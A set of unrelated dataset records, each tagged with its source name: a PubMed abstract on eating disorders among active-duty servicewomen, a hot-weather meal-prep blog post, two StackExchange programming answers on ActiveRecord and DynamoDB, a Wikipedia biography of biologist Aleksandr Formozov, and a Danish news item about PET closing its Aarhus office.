Eating disorders continue to be studied among civilian women. Gross disturbances in eating behaviors characterize the condition of anorexia nervosa (AN), currently seen among 1 to 2% of non-active duty women. Bulimia nervosa (BN) is prevalent among 2% of the female population, and both disorders have a female-to-male ratios of 10:1. Another category of eating disorders known as not otherwise specified (NOS) occurs in 3 to 35% of individuals in the reported literature. This study examined the prevalence of AN, BN, and NOS among a large sample of active duty women currently serving in the Army, Navy, Air Force, and Marines. Multiple military, professional, and behavioral variables were analyzed to provide an increased understanding and awareness of these disorders among all active duty service women. This descriptive, correlational study of 3,613 service women targeted females from the total population of three major medical centers (Army, Navy, and Air Force) and the total population of Marine women serving in Okinawa, Japan, at the time of the study. Anonymous survey return was obtained at 34% (N = 1,278). The study revealed an overall prevalence of 1.1% for AN, 8.1% for BN, and 62.8% for NOS among all service women. However, AN, BN, and NOS were found at significantly higher rates (p = 0.000) among women in the Marines, who reported AN at 4.9%, BN at 15.9%, and NOS at 76.7%. Use of laxatives, diuretics, diet pills, vomiting, and fasting for standards increased during the body measurement and fitness periods for all services, but year-round use of many of these behaviors occurred at significantly higher rates among Marines (p = 0.000). Multiple logistic regression analysis predicted several factors associated with the manifestation of eating disorders in this population of active duty women.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Meal Prep Tips for When It’s Too Hot To Cook
We’re just around the corner from some warm weather here in Australia, which will be fantastic after the wet winter we had! Before long, I’m sure plenty of us will be complaining that it’s too hot! That’s why I thought this blog would be a great idea. It covers some useful tips for meal prep without overheating—perfect for hot summers.
Here are some ways to prepare meals in the summer that don’t involve slaving over a hot stove when it’s simply too hot to spend the afternoon cooking.
Make use of raw ingredientsFor satisfying and healthy meals during the hot weather, refreshing salads and dishes that don’t need cooking are ideal. Take advantage of all those yummy in-season fruits and vegetables to make delicious salads. You can also use raw vegetables, such as carrot and cucumber, for spiralising. Mix them in with grilled chicken and pesto or some grains and a tasty vinaigrette for a refreshing meal that needs almost no cooking.
Use your barbecue or grillWe’re lucky to enjoy longer days in the summer, which is perfect for a backyard barbecue. By cooking outside, your kitchen (and the rest of the house) can stay cooler. It’s also a quick and easy way to cook plenty of vegetables and grill your meat. Grilled vegetables, such as onions, capsicums and sweet potato, can last for a few days in the fridge. and the extra flavour that comes with grilling food is also hard to beat!
Make time to grill some extra meat while preparing the evening meal and you’ll have easy lunch options for the next day too.
Choose no-cook mealsHave you ever noticed you don’t always feel like eating when it’s really hot out? Instead of roast dinners and stove-top meals, try substituting these for a couple of lighter, no-cook options. Use some shredded poached chicken in rice paper rolls or make a tasty wrap with tinned tuna and salad. Instead of cooking breakfast on a Sunday morning, try cutting up a delicious fresh fruit platter and serving with some muesli and yoghurt.
Cut food into smaller pieces for cookingIf you are after a cooked meal, a stir-fry is still a great option during hot weather as the heat from the cooktop doesn’t need to be on for long. You can keep your cooking time short by dicing the meat and vegetables into smaller pieces, so they take less time to cook. Bulk the stir-fry up with noodles that are quick and easy to heat, such as rice vermicelli.
Bring out your slow cookerThe beauty of using a slow cooker is you can leave the meal on low heat over a longer period of time. It also means you aren’t trapped in the kitchen stirring away while trying to get the sauce just right. The ‘set and forget’ approach is fantastic for warmer days when you would much rather be outside (or under the air-conditioner). You can also set the slow cooker up to cook the meal overnight, when it’s much cooler indoors.
When the warmer weather rolls around, quick and easy meals can become your friend. Look for meal options that don’t require a lot of cooking because when it’s hot inside and out, turning on the oven could start to feel like torture! Try following these simple meal prep tips for healthy eating when the heat is making you feel lazy.
Love, Kayla xx
* Results may vary. Strict adherence to the nutrition and exercise guide are required for best results.
|
{
"pile_set_name": "Pile-CC"
}
|
Q:
ActiveRecord, only objects with a nil parent record
I've got a basic forum set up. I want the posts#index action to only show records where parent_post_id is nil, and therefore not a reply post. I've got squeel installed, but I'm not sure if I have it set up right.
#app/controllers/posts_controller.rb
def index
@forum = Forum.find(params[:forum_id])
@posts = @forum.posts.where{ |post| post.thread == nil }
end
#app/models/post.rb
class Post < ActiveRecord::Base
has_many :replies, :class_name => "Post"
belongs_to :thread, :class_name => "Post", :foreign_key => "parent_post_id"
end
#config/initializers/squeel.rb
Squeel.configure do |config|
# To load hash extensions (to allow for AND (&), OR (|), and NOT (-) against
# hashes of conditions)
config.load_core_extensions :hash
# To load symbol extensions (for a subset of the old MetaWhere functionality,
# via ARel predicate methods on Symbols: :name.matches, etc)
config.load_core_extensions :symbol
# To load both hash and symbol extensions
config.load_core_extensions :hash, :symbol
end
A:
Try
@posts = @forum.posts.where{ "posts.parent_post_id is null" }
See
Conditions section of
http://api.rubyonrails.org/classes/ActiveRecord/Base.html
We say "posts" not "post" since the name of the table is "posts"
Added You don't need squeel for this type of simple where clause. We say "is null" since that is the proper SQL syntax for finding nil values, not "== nil".
|
{
"pile_set_name": "StackExchange"
}
|
Aleksandr Formozov
Aleksandr Nikolaevich Formozov (1899–1973) was a Russian biologist and environmentalist.
Alexander Formozov was born in Nizhny Novgorod to Nikolai Yelpidiforovich Formozov (1871–1928) and Elizabeth Fedorovna née Fedorova. His father worked in the local institutions, contributed to newspapers and was a keen hunter. Alexander's early studies were at the local Gymnasium after which he moved to study chemistry at the Warsaw Polytechnic Institute. In 1919 he joined the Red Army and fought on the Southern Front. He later moved to study biology and then graduated in natural sciences from Moscow State University in 1925. He went on an expedition to Mongolia and the Far East organized by the USSR Academy of Sciences. He became an associate professor in 1929 at Leningrad and a full professor from 1935. He headed the Research Institute of Poultry and Poultry industry from 1931 and an institute for fur and hunting.
He worked on aspects of biogeography from 1962. From 1945 Formozov centred his research on the ecology of the steppes and deserts found in the Soviet Union.
He married twice, first to Lyubov Nikolaevna nee Promptova (1903–1990) sister of the ornithologist Aleksandr Promptov. They had a son Aleksandr Aleksandrovich Formozov (1928–2009), who was a prominent archeologist. His second wife was Varvara Ivanovna Osmolovskaya (1916–1994) with whom he had two children.
References
External links
An article on Formozov's second wife as an ornithology student
Category:1899 births
Category:1973 deaths
Category:People from Nizhny Novgorod
Category:Soviet biologists
Category:20th-century biologists
Category:Russian environmentalists
Category:Moscow State University alumni
|
{
"pile_set_name": "Wikipedia (en)"
}
|
Politiets Efterretningstjeneste lukker sin afdeling i Aarhus og samler medarbejderne i København. PETs fremtidige opgaver i Jylland skal løses på en anden måde end i dag, siger PET-chef.
Politiets Efterretningstjeneste (PET) har i mange år haft en afdeling i Aarhus. Det er slut 1. marts 2013, hvor afdelingens knap 30 medarbejdere flyttes til PETs hovedsæde i Søborg ved København.
- PET råder over meget dygtige og engagerede medarbejdere i Aarhus, og vores regionale afdeling har gennem årene leveret en dygtig indsats. Som andre offentlige myndigheder har PET imidlertid pligt til at sikre, at vi udnytter vores ressourcer og kapaciteter bedst muligt. Det gør vi efter vores opfattelse bedst ved at samle vores kræfter i hovedkvarteret, så vi derfra kan levere en ensartet indsats i alle de dele af landet, hvor der er brug for det, skriver PETs chef, politimester Jakob Scharf, i en udtalelse til Berlingske Nyhedsbureau.
Han understreger, at PET har »mange og vigtige opgaver« i Aarhus og resten af Jylland:
- Dem vil vi fortsat løse, men vi vil gøre det på en anden måde end hidtil. Vi ved, at beslutningen har stor og indgribende betydning for de berørte medarbejdere, og det er vi naturligvis kede af. Men beslutningen er nødvendig, hvis PET også fremover skal kunne levere den indsats, der forventes af os, skriver PET-chefen.
Det har ikke været muligt at få en uddybende kommentar fra Jakob Scharf.
|
{
"pile_set_name": "OpenWebText2"
}
|
Q:
DynamoDB insert (put) item - return the item created?
In my Python script I insert a record (item) into DynamoDB table, but I realized the response from AWS doesn't include the actual item inserted:
{'ResponseMetadata': {'HTTPHeaders': {'connection': 'keep-alive',
'content-length': '2',
'content-type': 'application/x-amz-json-1.0',
'date': 'Fri, 27 Jan 2017 23:31:22 GMT',
'server': 'Server',
'x-amz-crc32': '234324243',
'x-amzn-requestid': 'xxxxxxxxxx'},
'HTTPStatusCode': 200,
'RequestId': 'xxxxxxxxxx',
'RetryAttempts': 0}}
This is unfortunate as I have logic like:
if not user.exists():
user = create_user()
else:
user = get_user()
user.do_something()
and I'd rather not do another round trip just to get the user object I just inserted.
I can, of course, mock the object since using boto3 in Python the user object is just a dictionary-like thing, but it's nice to be able to just use a single representation. Also it seems like the put_item call
r = user_table.put_item(Item={'user_id': uid, 'info' : { ... }})
should be able to return the put'd item? Or some other endpoint can?
Thanks for any insight!
A:
You need to set the property ReturnValues='ALL_NEW' on your put_item request to get the item back in the response. As documented here
Edit: The documentation is wrong, ALL_NEW isn't accepted for put_item. Since you have the exact item in memory as the parameter you passed to put_item, you really don't need it to be returned.
|
{
"pile_set_name": "StackExchange"
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.